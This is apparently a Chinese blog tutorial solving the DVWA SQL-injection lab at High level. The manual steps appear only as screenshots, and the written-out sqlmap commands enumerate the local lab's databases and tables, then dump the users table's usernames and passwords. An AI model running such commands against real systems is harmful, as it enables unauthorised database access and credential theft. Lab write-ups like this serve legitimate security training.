[网络安全]DVWA之SQL注入—High level解题简析

简介: DVWA请读者自行安装,本文不再赘述。

手工注入

判断注入类型

image.png

image.png

由以上两个回显可知,该注入类型为字符型注入。


判断注入点个数

image.png

image.png

由以上两个回显可知,注入点个数为两个。


爆库名

image.png

爆表名

image.png


爆列名

image.png


爆字段

image.png


sqlmap注入

image.png

查看是否存在注入点

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1"

image.png

存在注入点。


爆库名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" --dbs


image.pngimage.png


爆表名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa --tables

image.png

image.png


爆列名

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -t users --columnsimage.png

image.png

-D、-T为大写或小写均可


爆字段

python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/" --data "id=1" -D dvwa -T users -C user,password --dump

image.png

image.png



总结

以上为DVWA之SQL注入—high level解题简析,使用手工注入及sqlmap分享SQL攻击知识。

后续会分享DVWA之SQL注入—Impossible level代码审计。

我是秋说,我们下次见。


目录
相关文章
|
SQL 安全 网络安全
[网络安全]sqli-labs Less-23 解题详析
[网络安全]sqli-labs Less-23 解题详析
304 0
|
网络安全
[网络安全]upload-labs Pass-21 解题详析
[网络安全]upload-labs Pass-21 解题详析
393 0
|
网络安全
[网络安全]upload-labs Pass-20 解题详析
[网络安全]upload-labs Pass-20 解题详析
314 0
|
安全 网络安全 PHP
[网络安全]upload-labs Pass-18 解题详析
[网络安全]upload-labs Pass-18 解题详析
438 0
|
安全 网络安全 PHP
[网络安全]upload-labs Pass-17 解题详析
[网络安全]upload-labs Pass-17 解题详析
530 0
|
网络安全 数据安全/隐私保护 Python
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
[网络安全/CTF]护网杯 2018 easy_tornado 解题详析(Tornado之SSTI注入)
514 0
|
网络安全 PHP
[网络安全]upload-labs Pass-16 解题详析
[网络安全]upload-labs Pass-16 解题详析
267 0
|
SQL 安全 网络安全
DVWA SQL Injection (Blind) 通关解析
DVWA SQL Injection (Blind) 通关解析
|
网络安全 PHP 数据安全/隐私保护
[网络安全/CTF] 记一次PHP序列化反序列化解题详析
[网络安全/CTF] 记一次PHP序列化反序列化解题详析
528 5
|
SQL 安全 数据库
[dvwa] sql injection
[dvwa] sql injection